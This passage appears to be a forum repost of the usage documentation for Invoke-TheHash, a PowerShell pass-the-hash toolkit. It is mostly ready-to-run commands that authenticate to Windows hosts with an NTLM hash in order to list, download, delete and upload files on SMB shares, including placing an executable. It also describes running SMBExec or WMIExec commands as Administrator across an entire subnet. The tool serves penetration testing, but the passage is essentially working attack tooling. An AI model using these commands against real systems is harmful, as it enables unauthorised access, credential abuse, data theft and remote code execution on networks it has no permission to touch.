F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose Example: Recursively list the contents of a share starting at the root. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share Example: Recursively list the contents of a share subdirectory and return only the contents output to a variable. $directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify Example: Delete a file on a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt Example: Delete a file in subdirectories within a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt Example: Download a file from a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt Example: Download a file from within a share subdirectory and set a new filename. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt Example: Download a file from a share to a byte array variable instead of disk. $password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify Example: Upload a file to a share subdirectory. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe Example: Upload a file to share from a byte array variable. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify Screenshot: Invoke-TheHash Function for running Invoke-TheHash functions against multiple targets. Parameters: Type - Sets the desired Invoke-TheHash function. Set to either SMBClient, SMBEnum, SMBExec, or WMIExec. Target - List of hostnames, IP addresses, CIDR notation, or IP ranges for targets. TargetExclude - List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude from the list or targets. PortCheckDisable - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up he function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. PortCheckTimeout - Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI or SCM on the target. CommandCOMSPEC - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. SMB1 - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 Screenshot: Sursa: https://github.com/Kevin-Robertson/Invoke-TheHash/
×
×
  • Create New...